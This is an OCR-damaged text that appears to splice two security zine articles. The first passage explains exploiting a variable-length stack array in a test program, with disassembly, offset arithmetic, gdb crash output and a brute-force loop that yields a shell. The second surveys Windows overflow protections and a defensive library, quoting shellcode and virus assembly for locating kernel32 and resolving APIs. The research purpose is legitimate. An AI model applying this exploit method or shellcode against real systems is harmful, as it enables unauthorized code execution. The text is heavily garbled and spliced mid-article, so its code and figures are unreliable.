The last thr lines ar ax = (((eax + 15) >> 4) << 4); This rounds up 


and aligns eax to a paragraph boundary. 


804840e: 29 c4 sub Seax,sesp ; adjust esp 
8048410: 8d 5c 24 Oc lea Oxc(Sesp),%ebx ; ebx = esp 12 
8048414: 8d 42 O01 lea Oxl (Sedx),%eax ; eax = edx 1 
8048417: 89 44 24 04 mov Seax,0x4(Sesp) ; len argument 
804841b: c7 04 24 78 85 04 08 movl $0x8048578, (Sesp) ; fmt string 
"Sizeof (x): %d\n" 
8048422: e8 d9 fe ff ff call 8048300 <_init+0x3c> ; printf 
8048427: c7 44 24 08 04 00 00 movil S$0x4,0x8(%esp) ; len arg to 
804842e: 00 ; strncpy 
804842f: 8b 45 Oc mov Oxc (Sebp) , seax 
8048432: 89 44 24 04 mov Seax,0x4(Sesp) ; data to copy 
8048436: 89 lc 24 mov sebx, (esp) ; where to write 
; ebx = adjusted esp + 12 (see 0x8048410) 
8048439: e8 e2 fe ff ff call 8048320 <_init+0Ox5c> ; strncpy 
804843e: 89 f4 mov sesi,sesp ; restore esp 
8048440: b8 3a 00 00 O00 mov SOx3a,%eax ; ready to return 58 
8048445: 8d 65 £8 lea Oxfffffff8 (Sebp), esp 


; we restore esp again, just in case it 
; didn’t happen in the first place. 


8048448: 5b pop Sebx 
8048449: 5e pop sesi 
804844a: 5d pop Sebp 
804844b: c3 ret ; restore registers and return. 


What can we learn from the above assembly output? 


1) There is some rounding done on the supplied value, thus meaning 
small negative values (-15 > -1) and small values (1 - 15) will 
become 0. This might possibly be useful, as we’ll see below. 


When the supplied value is -16 or less, then it will be possible 
to move the stack pointer backwards (closer to the top of the 
stack). 


The instruction sub Seax, %esp at 0x804840e can be seen as add 
$16, %esp when len is -16. [1] 


2) The stack pointer is subtracted by the paragraph-aligned 
supplied value. 


Since we can supply an almost arbitary value to this, we can 
point the stack pointer at a specified paragraph. 


If the stack pointer value is known, we can calcuate the offset 

needed to point the stack at that location in memory. This 

allows us to modify writable sections such as the GOT and heap. 
3) gcc can output some wierd assembly constructs. 


--[ 4 - Moving on 


So what does the stack diagram look like in this case? When we 
reach 0x804840e (sub esp, eax) this is how it looks. 


O0xc0000000 [sect eters. % | Top of stack. 
| | 
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Oxbffff86c 0x08048482 Return address 
Oxbffff868 Oxbffff878 Saved EBP 

Oxbffff864 | . ...... Saved ESI 

Oxbffff860  é#|  ...... Saved EBX 

Oxbffff85c |  ...... .xocal variable space 
OXDEfETSS8 = i (|) weweane .ocal variable space 
Oxbffff854 |  ...... .ocal variable space 
Oxbf ESP 


To overwrite the saved return address, we need to calculate what 
to make it subtract by. 


delta = Oxbffff86c - Oxbffff850 
delta = 28 


We need to subtract 12 from our delta value because of the 
instruction at 0x08048410 (lea Oxc(%esp),%ebx) so we end up with 16. 


If the adjusted delta was less than 16 we would end up overwriting 
Oxbffff85c, due to the paragraph alignment. Depending what is in 
that memory location denotes how useful it is. In this particular 
case its not. If we could write more than 4 bytes, it could be 
useful. 


When we set -16 AAAA as the arguments to dmeiswrong, we get: 
andrewg@supernova: /papers/strawsS gdb -q ./dmeiswrong 


Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1". 
(gdb) set args -16 AAAA 


(gdb) r 
Starting program: /home/andrewg/papers/straws/dmeiswrong -16 AAAA 
sizeof (x): -16 


Program received signal SIGSEGV, Segmentation fault. 
0x41414141 in ?? () 


Based with the above information, an exploit can be written for 
dmeiswrong.c. See the attached file iyndwacyndwm.c for more 
information. 


The attached exploit code (iyndwacyndwm.c) works on my system 

(gcc version: Debian 1:3.3.5-8ubuntu2, kernel: Linux supernova 
2.6.10-5-686 #1 Fri Jun 24 17:33:34 UTC 2005 i686 GNU/Linux) with 
success. 

It may fail on the readers machine due to different initial stack 
layout, and different compiler options / generated code. You may 
need to play a bit with gdb a bit to get it working. However, this 
technique should work fine for other people, they may just need to 
play around a bit to get it working as expected. 


To get it working for your system, have a look at what causes a 
segfault (this can be achieved with a simple 


"for i in ‘seq 0 -4 -128* ; do ./dmeiswrong $i AAAA ; done" 


loop and seeing if the offset segfaults. The attached Makefile 
implements this loop for you when you type make bf. You can then 
replay the offset and args in GDB to see if EIP is pointing to 
0x41414141. 


Then its a matter of getting the stack layout correct for so the 
exploit will run. In the included exploit, I’ve made it so it 
tries to determine th xact offset to where the shellcode starts. 
This technique is further explained in [2]. Otherwise, this 
technique could be done via examining the heap layout at "_start" 
(entry point of the executable) and looking at what is in memory 
from the top, and seeing the offset, as its quite possible that 
things have been moved around during different kernel releases. 
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In order to make it easier for people to play around with this 
technique, I’ve included a precompiled dmeiswrong and iyndwacyndwm 
files, which hopefully demonstate the problem. If iyndwacyndwm 
does not work for you, try iyndwacyndwm-lame which tries the 
standard "pick an offset from some value (lik sp)" technique to 
try and gain code execution on the host. 


I haven’t performed a wide scale test against vulnerable compilers, 
but due to the code construct compilers would be most likely to 
emit, I suspect a majority of compilers which support variable 
sized stack arrays to be vulnerable. Thos which wouldn’t be 
vulnerable would be those which include code to verify if this is 
not a problem during runtime. 


Exploitability of this type of bug appears to be feasible on other 
architectures, such as PPC, as I was able to get it to crash with 
Spc being something not of my choice. (such as, 0x6f662878, and 
sometimes Spc would be pointing at an invalid instruction on the 
stack). This was done via just incrementing the value passed as 
the len by 4 in a loop. Make bf should point out the exploitable 
architectures as they should crash (eventually.) 


I didn’t have enough time to look into this further as the time to 
submit the final paper drew to close, and PPC assembly and MacOSX 
are not my strongest skills. 


—- Requirements for exploitability 


In order for an architecture / Operating System to be exploitable, 
the architecture needs to support having a stack which can be moved 
about. If the stack contains embedded flow control information, 
such as saved return addresses, it makes it significantly easier 

to exploit, and partially less dependant on what value the stack 
pointer contains. This in turn increases reliability in exploits, 
especially remote ones. 


Additionally, the compiler needs to: 


— support variable sized stack arrays (which as demonstrated above, 
is a feature of the C99 standard) 


—- not emit code that performs sanity checking of the changed stack 
pointer. It is forseeable that if this issue gets a lot of public 
attention, that various compiler security patches (such as 
pro-police, stackguard, so fourth) will add detection of this 
issue. 


The direction the stack grows is not that relevant to the problem, 
as if the x86 stack grew upwards, the instruction at 0x804840e, 
would be written as addl %Seax, %Sesp, and given the parameter len 
as -16 would could be rewritten as subl $16, %esp, which would 
allow access to the saved eip and saved frame pointer, amongst 
other things. 


The attached Makefile has a "bf" option which should allow you 

to test if your architecture is vulnerable. In order to make this 
work as expected, you’ll need to supply the top of the stack for 
your architecture, and a proper shellcode. A recommended test 
shellcode is the trap instruction (int3 on x86, trap on ppc) which 
generates a particular signature when the code is executed. 


The output from the make bf command on my laptop is as follows: 


andrewg@supernova: /papers/straws/src$ make bf 

for i in ‘seq 0 -4 -256* ; do ./iyndwacyndwm-lame Si ; done 
sizeof(x): 0 

sizeof (x): —-4 
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sizeof (x): -8 
sizeof (x): -12 
sizeof (x) -16 
sh-3.00S exit 
sizeof (x): -20 
sh-3.00S$ exit 
sizeof (x): -24 
sh-3.00S exit 
sizeof (x): -28 
sh-3.00$ exit 
sizeof (x): -32 
/bin/sh: line 1: 16640 Segmentation fault ./iyndwacyndwm-lame Si 
sizeof (x): -36 


[ snipped a bunch of Segmentation fault messages ] 


/bin/sh: line 1: 16648 Floating point exception./iyndwacyndwm-lame $i 
sizeof(x): -—68 
/bin/sh: line 1: 16649 Floating point exception./iyndwacyndwm-lame $i 
sizeof(x): -72 


[ snipped a bunch of Floating point exception messages and segv ] 
andrewg@supernova:  /papers/straws/srcs 
The make bf-trap command generates the following output: 


for i in ‘seq 0 -4 -256* ; do ./iyndwacyndwm-lame-trap Si ; done 


sizeof (x) ) 

sizeof (x) -4 

sizeof (x) -8 

sizeof(x): -12 

sizeof (x): -16 

/bin/sh: line 1: 16983 Trace/breakpoint trap ./iyndwacyndwm-lame-trap Si 
sizeof(x): -20 

/bin/sh: line 1: 16984 Trace/breakpoint trap ./iyndwacyndwm-lame-trap Si 
sizeof(x): -—24 

==. = Binks 


[1] http://www.eduplace.com/math/mathsteps/6/b/ 
[2] http://packetstorm. linuxsecurity.com/groups/netric/envpaper.pdf 


--[ 6 - Finishing up 


I’d like to greet all of the felinemenace people ((in no particular order) 
nevar, nemo, mercy, ash, kwine, jaguar, circut, nd and nOOne), along with 
pulltheplug people, especially arcanum. 


Random greets to dme, caddis, Moby for his visual basic advice while 
discussing this problem at the pub, and zen-parse. 


It kinda goes without saying, but I’d like to thank all the people who have 
supplied feedback for my article. 


Need a challenge ? ] 
Visit http://www.pulltheplug.org ] 


Want to visit Australia and want a reason? ] 
RUXCON is being held on 1st and 2nd of October - see you there ] 
http://www.ruxcon.org.au/ ] 


=[ EOF ] 
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=i Ess Introduction 


Nowadays there are many exploit prevention mechanisms for windows but each 
of them can by bypassed (according to my information). Reading this 
article keep in mind that codes and information provided here will 
increase security of your system but it doesn’t mean you will be 
completely safe (cut&paste from condom box user manual). 


sa herbs. Known protections 


Like I said before, today there exist many commercial prevention 
mechanisms. Here we will get a little bit deeper inside of most common 
ring3 mechanisms. 


IT.A Hooking API functions and stack backtracing 


Many nowadays buffer overflows protectors are not preventing the buffer 
overflow attack itself, but are only trying to detect running shellcode. 
Such BO protectors usually hook API functions that usually are used by 
shellcode. Hooking can be done in ring3 (userland) or kernel level (ring0O, 
mainly syscalls and native api hooking). Lets take a look at example of 
such actions: 


stack backtracing 


Lets check the NGSEC stack backtracing mechanism, now imagine a call was 
made to the API function hooked by NGSEC Stack Defender. 


So when a call to any of hooked APIs is done, the main Stack Defender 
mechanism stored in proxydll.dll will be loaded by the hooked function 
stored in .reloc section. Then following tests will be done: 


Generally this comes up as params for the proxydll function (all of the 

arguments are integers): 

assume: argument 1 [esp+O0ch] its "first" passed argument to the 
function this is always equal to the stack address 
OxC bytes from the ESP. 


argument 2 = address from where hooked api was called 
argument 3 = some single integer (no special care for this one) 
argument 4 = stack address of given param thru hooked API call 


MAIN STEPS: 


0 Ty —- execute VirtualQuery [1] on [espt+0Ch] (stack address) -LOCATION1 
=) Pies —- execute VirtualQuery [1] on call_ret address - LOCATION2 
- III. - if LOCATION1 allocation base returned in one of the members of 


MEMORY_BASIC_INFORMATION [2] is equal to the LOCATION2 

allocation base then the call is comming for the stack space. 

Stack Defender kills the application and reports attack probe to 

the user. If not next step is executed. 

> IV: - call IsBadWritePtr [3] on location marked as LOCATION2 (addres 
of caller). If the API returns that location is writeable Stack 
Defender finds it as a shellcode and kills the application. If 
location is not writeable StackDefender executes the original 
APTI. 
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hooking exported API functions 


When module exports some function it means that it’s making this fuction 
usable for other modules. When such function is exported, PE file includes 
an information about exported function in so called export section. 
Hooking exported function is based on changing the exported function 
address in AddressOfFunctions entry in the export section. The great and 
one of the first examples of such action was very infamous i-worm.Happy 
coded by french virus writter named as Spanska. This one hooks send and 
connects APIs exported from WSOCK32.DLL in order to monitor all outgoing 
messages from the infected machine. This technique was also used by one of 
the first win32 BO protectors - the NGSEC’s Stack Defender 1.10. The NGSEC 
mechanism modifies the original windows kernel (kernel32.d1ll1) and hooks 
the following functions: 


(the entries for each of the exported functions in EAT (Export Address 
Table) were changed, each function was hooked and its address was 
"repointed" to the .reloc section where the filtering procedure will 
be executed) 


— WinExec 
CreateProcessW 
CreateProcessA 

— LoadLibraryExA 

— LoadLibraryExWw 

— OpenFile 

—- CreateThread 
CreateRemoteThread 

- GetProcAddress 

—- LoadModule 

— CreateFileA 

— CreateFilew 

- _lopen 

-— _lereat 

— CopyFileA 

— CopyFilew 

— CopyFileExA 

— CopyFileExW 

— MoveFileA 

— MoveFileExW 

—- LockFile 

— GetModuleHandleA 

— VirtualProtect 

—- OpenProcess 

— GetModuleHandleW 

— MoveFileWithProgressA 

—- MoveFileWithProgresswW 

— DeleteFileA 


inline API hooking 


This technique is based on overwritting the first 5 bytes of API function 
with call or unconditional jump. 


I must say that one of the first implementations of such "hooking" 
technique (well i don’t mean the API hooking method excatly) was described 
by GriYo in [12]. The feature described by GriYo was named "EPO" —- 
"Entry-point Obscuring". Instead of changing the ENTRYPOINT of PE file [9] 
GriYo placed a so called "inject",a jump or call to virus inside host code 
but far away from the fil ntry-point. This EPO technique makes a virus 
detection much much harder... 
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Of course th mulated bytes must be first known by the "hooker". So it 
generally must use some disassembler engine to determine instructions 
length and to check its type (i think you know the bad things can happen 
if you try to run grabbed call not from native location). Then those 
instructions are stored locally and after that they are simply executed 
(emulated). After that the execution is returned to native location. Just 
like the schema shows. 


Inline API hooking feature is also present in Detours library developed 


by Microsoft [4]. Here is the standard sample how hooked function looks 
like: 
BEFORE: 
; SNIP 
CreateProcesA: push ebp ; 1 bytes 
mov ebp,esp ; 2 bytes 
push 0 ; 2 bytes 


push dword ptr [ebpt+2c] 


; SNIP 


AFTER (SCHEMA) : 


; SNIP 
CreateProcessA: jmp hooked_function 
where_ret: push dword ptr [ebpt+2c] 
hooked_function: pushfd ; save flags 
pushad ; save regs 
call do_checks ; do some checks 
popad ; load regs 
popfd ; loadflags 
push ebp ; emulation 
mov ebp,esp ; of original 
push 0 ; bytes 
push offset where_ret ; return to 
ret ; Original func. 
; SNIP 


Such type of hooking method was implemented in Okena/CSA and Entercept 
commercial mechanisms. When the hooked function is executed, BO prevention 
mechanism does similiar checks like in described above. 


However BO preventers that use such feature can be defeat easily. Because 
I don’t want to copy other phrack articles I suggest you looking at 
"Bypassing 3rd Party Windows Buffer Overflow Protection" [5] (phrack#62). 
It is a good article about bypassing such mechanisms. 


ti. B Security cookie authentication (stack protection) 


This technique was implemented in Windows 2003 Server, and it is very 
often called as "build in Windows 2003 Server stack protection". In 
Microsoft Visual C++ .NET Microsoft added a "/GS" switch (default on) 
which place security cookies while generating the code. The cookie 

(or canary) is placed on the stack before the saved return address 
when a function is called. Before the procedure returns to the caller 
the security cookie is checked with its "prototype" version 

stored in the .data section. If the buffer overflow occurs the cookie 
is overwritten and it mismatches with the "prototype" one. This is the 
sign of buffer overflow. 
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Bypassing this example was well documented by David Litchfield so I 
advice you to take a look at the lecture [6]. 


TE Ve Additional mechanisms - module rebasing 


When we talk about buffer overflow prevention mechanism we shouldn’t 
forget about so called "module rebasing". What is the idea of this 
technique? Few chapters lower you have an example code from "searching for 
kernel in memory" section, there you can find following variables: 


F SNIP 

; some of kernel base values used by Win32.1s 
_kernells label 

dd 077e80000h - 1 ;NT 5 

dd Obff70000h —- 1 ;w9x 

dd 077£00000h - 1 ;NT 4 

dd -1 

; SNIP 


Like you probably know only these kernel locations in the table will be 
searched, what happens if shellcode doesn’t know the imagebase of 
needed module (and all the search procedures failed)? Answer is easy 
shellcode can’t work and it quits/crashes in most cases. 


on 


How the randomization is done? Generally all PE files(.exe/.dlls etc. etc) 
have an entry in the PE record (offset 34h) which contains the address 
where the module should be loaded. By changing this value we are able to 
relocate the module we want, of course this value must be well calculated 


otherwise your system can be working incorrectly. 


Now, after little overview of common protections we can study the 
shellcode itself. 


--[{ III. What is shellcode and what it "must do" 
For those who don’t know: Shellcode is a part of code which does all the 
dirty work (spawns a shell / drops trojans / bla bla) and it’s a core of 


exploit. 


What windows shellcode must do? Lets take a look at the following sample 
schema: 


— getting EIP 

-— decoding loop if it’s needed 

—- getting addresses of kernel/needed functions 
— spawning a shell and all other dirty things 


If you read assumptions (point II) and some other papers you will 
probably know that there is no way to cut third point from shellcode 
schema. Every windows shellcode must obtain needed data and that’s a step 
we will try to detect. 


Of course shellcode may use the hardcoded kernel value or hardcoded API 
values. That doesn’t mean that shellcode will be not working, but 
generally things get harder when attacker doesn’t know the victim machine 
(version of operating system - different windows = different kernel 
addresses) or when the victim machine works with some protection levels 
like image base rebasing. Generally hardcoding those values decreases th 
success level of the shellcode. 


==" TVs Getting addresses of kernel/needed functions - enemy study 
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To 


dig more deeply inside the stuff I advice you to read some papers from the 


Reference s 


ection 


--[ IV.A — getting kernel address (known mechanisms) 
IV.A.A - PEB (Process Environment Block) parsing 
PEB (Process Environment Block) parsing - the following method was first 
introduced by the guy called Ratter [7] from infamous 29A group. By 
parsing the PEB_LDR_DATA we can obtain information about all currently 
loaded modules, like following example shows: 

; SNIP 

mov eax,dword ptr fs: [30h] ; EAX is now PEB base 

mov eax,dword ptr [eaxtOch] ; EAX+0Ch = PEB_LDR_DATA 

mov esi,dword ptr [eax+lch] ; get the first entry 

mov ebx, [esit08h] ; EBX=ntdll imagebase 

module_loopx: 

lodsd 

mov ebx, [eaxt+08h] ; EBX=next dll imagebase 

test ebx,ebx 

jz @last_one_done 

int 3 

mov esi,eax ; continue search 

jmp module_loopx 

; SNIP 
IV.A.B - searching for kernel in memory 
searching for kernel in memory - this example scans/tries different kernel 
locations (for different windows versions) and searches for MZ and PE 
markers, the search progress works together with SEH frame to avoid access 
violations. 


Here is the example method 


(fragment of Win32.1s virus): 


: SNIP 

cld 

lea esi, [ebp + offset _kernells @delta] ; load the kernel 
; array 

@nextKernell: 

lodsd ; load on base to EAX 

push esi ; preserve ESI (kernel array location) 

inc eax ; is this the last one ? (-1+1=0) 

jz @bad 7; seems so —-> no kernel base matched 

push ebp ; preserve EBP (delta handler) 

call @kernel1lSEH ; check the loaded bas 

mov esp, [esp + O8h] ; restore the stack 


@badl: 


pop 


pop dword ptr fs:[0] ; restore old SEH frame 
eax ; normalize the stack 
ebp ; load delta handle 


pop 
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pop esi 7 go back to kernel array 
jmp @nextKernell ; and check another base 
@bad: 

pop eax ; no kernel found, virus 
jmp @returnHost ; returning to host 


; some of kernel base values used by Win32.1s 
_kernells label 
dd 077e80000h - 1 ;NT 5 
dd Obff70000h - 1 ;wOx 
dd 077£00000h - 1 ;NT 4 
dd -1 


@kernellSEH: 


push dword ptr fs: [0] ; setup new SHE handler 
mov dword ptr fs:[0],esp 
mov ebx,eax ; EBX=imagebase 


xchg eax,esi 
xOr e€ax,eax 


lodsw ; get first 2 bytes from imagebase 
not eax ; is it MZ? 
cmp eax,not ’ 2M’ ; compare 
jnz @badl ; it isn’t check next base 
mov eax, [esi + O03ch] ; MZ is found now scan for PE sign 
add eax, ebx ; normalize (RVA2VA) 
xchg eax,esi 
lodsd ; read 4 bytes 
not eax 
cmp eax,not ’EP’ ; is it PE? 
jnz @badl ; nope check next base 
pop dword ptr fs: [0] ; return (setup) old SEH 
pop eax ebp esi ; clear stack 
; EBX is now valid kernel base 


; SNIP 
==) EV B — getting API addresses (known methods) 
IV.B.A - export section parsing 


export section parsing - when the module (usually kernel32.dl1l1l) base is 
located, shellcode can scan export section and find some API functions 
needed for later use. Usually shellcode is searching for GetProcAddress () 
function address, then it is used to get location of the others APIs. 


Following code parses kernel32.dll export section and gets address of 
GetProcAddress API: 


; SNIP 
; EAX=imagebase of kernel32.d1l1l 


xor ebp,ebp ; zero the counter 
mov ebx, [eaxt+3ch] ; get pe header 

add ebx, eax ; normalize 

mov edx, [ebxt+078h] ; export section RVA 
add edx, eax ; normalize 

mov ecx, [edx+020h] ; address of names 

add ecx,eax ; normalize 

mov esi, [edx+0Olch] ; address of functions 
add esi,eax ; normalize 


15.txt Wed Apr 26 09:43:44 2017 8 
loop_it: 
mov edi, [ecx] 7 get one name 
add edi,eax ; normalize 
cmp dword ptr [edit4],’Acor’ ; is it GetP-rocA-ddress ?? :) 
jne @1 ; nope —-> jump to @L 
; yes it is 
add esi,ebp ; add out counter 
mov esi, [esi] ; get the address 
add esi,eax ; normalize 
Ant .3 ; ESI=address of GetProcAddress 
@1: 
add ecx,4 ; to next name 
add ebp, 4 7 update counter (dwords) 
jmp loop_it ; and loop it again 
i; SNIP 
IV.B.B - import section parsing 
import section parsing - 99% of hll applications import 


GetProcAddress/LoadLibraryA, 


Table) 


Just like following code shows: 


it means that their IAT 
includes address and name string of the mentioned functions. 
If shellcode 


(Import Address 


"knows" the imagebase of target application it can easily 
grab needed address from the IAT. 


a 


;followi 


IMAGEBASE 


mov 
mov 
add 


mov 
add 
add 
cmp 
jne 


SNIP 


ebx, IMAGEBASE 
eax, ebx 
eax, [eaxt3ch] 


edi, [eaxt+80h] 
edi,ebx 
ebp, ebp 


edx, [edit+10h] 
edx, ebx 


esi, [edi] 
esi,ebx 


@loop: 


eax, [esi] 
eax, ebx 
eax,2 
dword ptr 
@1 


edx, ebp 
edx, [edx] 


[eax],’daoL’ ; 


equ 00400000h 


ng example gets LoadLibraryA address from IAT 


; PE header 


; import RVA 
; normalize 


; pointer 


to addresses 


; normalize 


; pointer 


to ascii strings 


; normalize 


is this 


LoadLibraryA? 


; normalize 
; edx=address of 
; LoadLibraryA 


; increase counter 
7; next name 


; loop it 
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; SNIP 


After this little introduction we can finally move to real things. 
--[ V. New prevention techniques 


While thinking about buffer overflow attacks I’ve noticed that methods 
from chapter IV are most often used in shellcodes. And thats the thing 

I wanted to prevent, I wanted to develop prevention technique which acts 
a 

m 


in very early stage of shellcode execution and here are the results of 


Why two Protty libraries / two techniques of prevention? 


When I have coded first Protty (Pl) library it worked fine except some 
Microsoft products like Internet Explorer, Explorer.exe (windows manager) 
etc. in thoose cases the prevention mechanisms eat all cpu. 

I simply got nervous and I have rebuilt the mechanisms and that’s how 
second Protty (P2) library was born. Im describing them both because 
everything that gives any bit of knowledge is worth describing :) Anyway 
Im not saying the second one is perfect each solution got its bad and 
good points. 


What I have don the protection features: 
— protecting EXPORT section - protecting function addresses array 
(any exe/dll library) 


—- IAT RVA killer (any exe/dll library) 

- protecting IAT - protecting functions names array (any exe/dll library) 
— protecting PEB (Process Environment Block) 

— disabling SEH/Unhandled Exception Filter usage 

—- RtlEnterCrticialSection pointer protector 


5 


NOTE: All those needed pointers (IMPORT/EXPORT sections) are found in 
Similiar way like in IVth chapter. 


FEATURE: EXPORT SECTION PROTECTION (protecting "function addresses array") 


Every shellcode that parses EXPORT section (mainly kernel32.dll one) want 
to get to exported function addresses, and that’s the thing I tried to 
block, here is the technique: 


Algorithm/method for mechanism used in Prottyl (Pl): 


1. Allocate enough memory to handle Address Of Functions table from 
the export section. 


Address of Function table is an array which cointains addresses 
of exported API functions, like here for KERNEL32.DLL: 


D:\>tdump kernel32.dll kernel32.txt & type kernel32.txt 


(dies SN LD 2:52) 

Name RVA Size 
Exports O0006D040 00006B39 
(aie SN TPH ss) 


Exports from KERNEL32.d1] 
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942 exported name(s), 942 export addresse(s). Ordinal base is 1. 
Ordinal RVA Name 

0000 000137e8 ActivateActCtx 

0001 000093fe AddAtomA 

0002 0000d496 AddAtomw 

0003 000607c5 AddConsoleAliasA 

0004 0006078e AddConsoleAliasw 

0005 0004e0al AddLocalAlternateComputerNameA 

0006 O004df8c AddLocalAlternateComputerNameW 

(52-550 Lp 25°) 


Where RVA values ar ntries from Address of Functions table, so 
if first exported symbol is ActivateActCtx, first entry of Address 
of Function will be its RVA. The size of Address of Functions 
table depends on number of exported functions. 


All those IMPORT / EXPORT sections structures are very well 
documented in Matt Pietrek, "An In-Depth Look into the Win32 
Portable Executable File Format" paper [9]. 


Copy original addresses of functions to the allocated memory. 
Make original function addresses entries writeable. 

Erase all old function addresses. 
Make erased function addresses entries readable only. 

Update the pointer to Address of Functions tables and point it to our 
allocated memory: 

—- Make page that contains pointer writeable. 

— Overwrite with new location of Address of Function Table 


—- Make page that contains pointer readable again. 


Nos WN 


r 


Gl 


7. Mark allocated memory (new function addresses) as PAGE_NOACCESS. 


We couldn’t directly set the PAGE_NOACCESS protection to original 
function addresses because some other data in the same page must be 
also accessible (well SAFE_MEMORY_MODE should cover all cases even when 
protection of original page was changed to PAGE_NOACCESS - however such 
action increases CPU usage of the mechanism). The best way seems to be 
to allocate new memory region for it. 


I 


What does the PAGE _NOACCESS protection? 


— PAGE_NOACCESS disables all access to the committed region of pages. 
An attempt to read from, write to, or execute in the committed region 
results in an access violation exception, called a general protection 
(GP) fault. 


Now all references to the table with function addresses will cause an 
access violation exception, the description of the exception checking 
mechanism is written in next chapter ("Description of mechanism 
implemented in ..."). 


Just like the schema shows (A. - stands for "address"): 


--- SNIP --- START OF SCHEMA. la 


SOME PE MODULI 


[J] 


| export section | 
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RY) 
DRS 


/ PAGE 
NO 
\ ACCESS 


RIGHTS 


TH NULL! 


start + imagebase 
Gide) 0. 6) ff eee eee Ese > OLD ARRAY WITH FUNCTIONS ADDRS 
| 
NUMBER OF NAMES 
EFORE% | AFTER> 
A. OF FUNCTIONS 
+ --//-- | 
A. OF NAMES | (NEWLY ALLOCATED MEMO 
—-> NEW ARRAY WITH FUNCTIONS AD 
A. OF ORDINALS | 
Cores) | function 1 addr | 
end | function 2 addr |- 
| | 
ALL FUNCTION ADDRESSES IN OLD ARRAY 
WERE PERMANENTLY OVERWRITTEN WI 
—-— SNIP ---— END OF SCHEMA. la 


(P2): 


I 


Ne} 


2 
3 
A, 
Ds 
6 
oh 
8 
8 


Copy original 
Make original 


Make erased 
Make pointer 
Al 


allocated decoy. 
Updat 


Allocate enough memory to handle Address 
the export section. 

addresses to the allocated 
function addresses entries 
Erase all old function addresses. 
Function addresses 


ntri 


memory. 
writeable. 


adabl 


protected region list 


locate small memory array for decoy 
Write entry to protected region lists. 
Update the pointer to Address Of Functions and point it to our 


(write t 


sr only. 


to Address Of Functions writeable. 


(with PAGE_NOACC 


able entry) 


10.Make pointer to Address Of Function readable only. 


==> JONI Sos oA 


SOME 


PE 


MODULE 


export sectio 


start 


(23.8) 


NUMBER OF NAM 


ES 
E 


RT OF SCH 


im 
py 


MA. 


lb 


+ imagebase 


BEFORE 


A. OF FUNCTIONS 
A. OF NAMES 
A. OF ORDINALS 
Gets) 
end 


ES right 


Of Functions table from 


Ss). 


> OLD ARRAY WITH FUNCTIONS ADDRS 


/PAG 


ENOACCESS 


Somewhere in memory: 
(allocated memory with functions 
address entries): 


| function 1 addr 
| function 2 addr 


RIGHTS 
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ALL FUNCTION ADDRESSES IN OLD ARRAY 
WERE PERMANENTLY OVERWRITTEN WITH NULL! 


--- SNIP --- END OF SCHEMA. lb 


What have I gained by switching from the first method (real arrays) to the 
second one (decoys) ? 


The answer is easy. The first one was pretty slow solution (all the time i 
needed to deprotect the region and protect is again) in the second one i 
don’t have to de-protect and protect the real array, the only thing i need 
to do is update the register value and make it point to the orginal 
requested body. 


FEATURE: IMPORT SECTION PROTECTION (protecting "functions names array" + 
Ses IAT RVA killer) 


IAT RVA killer mechanism for both Prottyl (P1) and Protty2 (P2) 


All actions are similar to those taken in previous step, however here we 
are redirecting IMPORTS function names and overwriting IAT RVA (with 
pseudo random value returned by GetTickCount - bit swapped). 


And here is the schema which shows IAT RVA killing: 


—-- SNIP --- START OF SCHEMA. 2 


SOME PE MODULE 


start + imagebase 
Gees .. (Me “ahs eeeeese= > MODULE IMPORT SECTION 


| 
EXPORT SIZE | 
| 


BEFORE * AFTER> 
IMPORT RVA > NO EXISTING LOCATION (*) 
+ --//-- 
IMPORT SIZE 
(ees) 
end 
(*) -— the IMPORT RVA is overwritten with value returned by GetTickCount 


swaped one time, generally it’s kind of idiotic action because 
many of you can assume such operation can give a drastic effect 
with application stability. Well you are wrong, overwritting the 
IMPORT RVA >after< successful loading of any pe module has no 
right to cause instability (atleast it worked in my case, remeber 
this is windows and you are messing a lot ...) 


a 
< 
> 
i) 


--- SNIP --- END OF SCH 


And here’s the one describing protecting "functions names array", for 
Prottyl (Pl): 


MA. 3a 


GI 


-=—>).SNIP == START “OF SCH 
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import section tblabla 
oaictcatactie toes steele tens > ARRAY OF FUNCTION NAMES 
start | 
Geen) | 
BEFORE%* | AFTER> 
A. OF NAMES > (NEWLY ALLOCATED MEMORY) 
+blabla NEW ARRAY OF FUNCTION NAMES 
Gin) | 
end 
| "Functionl",0 |/ PAGE 
| "Function2",0 |- NO 
| "Function3",0 |\ ACCESS 
RIGHTS 
ALL NAMES IN OLD NAMES OF FUNCTIONS ARRAY 
WERE PERMANENTLY OVERWRITTEN BY NULL 
NOTE: I have choosed Address Of Names array, because it is much less 
accessed memory region than Address Of Functions array - so 
less CPU consumption (but bit more unsecure - you can do it 
yourself). 
—--— SNIP --- END OF SCHEMA. 3a 
And here’s the one describing protecting "functions names array", for 
Prottyl (P2): 
—--— SNIP --- START OF SCHEMA. 3b 
SOME PE MODULE 
import section tblabla 
SaaS Se5= > ARRAY OF FUNCTION NAMES 
start | 
(esa) | 
BEFORE%* | AFTER> / PAGE 
A. OF NAMES > | DECOY |-NO ACCESS 
+blabla \ RIGHTS 
Cae) 
end 
Somewhere in memory: 
(allocated memory with original 
function names): 
| | 
| "Function1",0 | 
| "Function2",0 | 
| "Function3",0 | 
ALL NAMES IN OLD NAMES OF FUNCTIONS ARRAY 
WERE PERMANENTLY OVERWRITTEN BY NULL 
—--— SNIP --- END OF SCHEMA. 3b 
FEATURE PEB (Process Environment Block) protection (PEB_LDR_DATA) 
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Algorithm/method for mechanism used in Prottyl (Pl): 


1. Get PEB_LDR_DATA [7] structure location 
2. Update the region list 
3. Mark all PEB_LDR_DATA [7] structure as PAGE _NO_ACCESS 


—-- SNIP --- START OF SCHEMA. 4a 

| PEB_LDR_DATA | \ 

| Ses xe |---- NOW MARKED WITH PAGE_NOACCESS. 
| saiiees |/ 

--- SNIP --- END OF SCHEMA. 4a 


Algorithm/method for mechanism used in Protty2 (P2): 


Get InInitializationOrderModuleList [7] structure location 
Write table entry (write generated faked address) 

Write table entry (write original location of InInitOrderML...) 
Change the pointer to InInitializationOrderModuleList, make it 
point to bad address. 


mwwN FE 


Here is the schema (ML stands for ModuleList): 


--- SNIP --- START OF SCHEMA. 4b 


[PEB_LDR_DATA]: 


Length 
Initialized 
SsHandle |LIST_ENTRY InInit.OrderML | 
wee ee > | | 
InLoadOrderML | 
| 
InMemoryOrderML | 
BEFORE* | AFTER> 
InInit.OrderML > RANDOM MINUS VALUE 
(not existing location) 


NOTE: why MINUS VALUE? Generally I choose minus one because ther 
is no minus valid location and this will generate a exception 
for sure, anyway this value can be changed and we can add a DECOY 
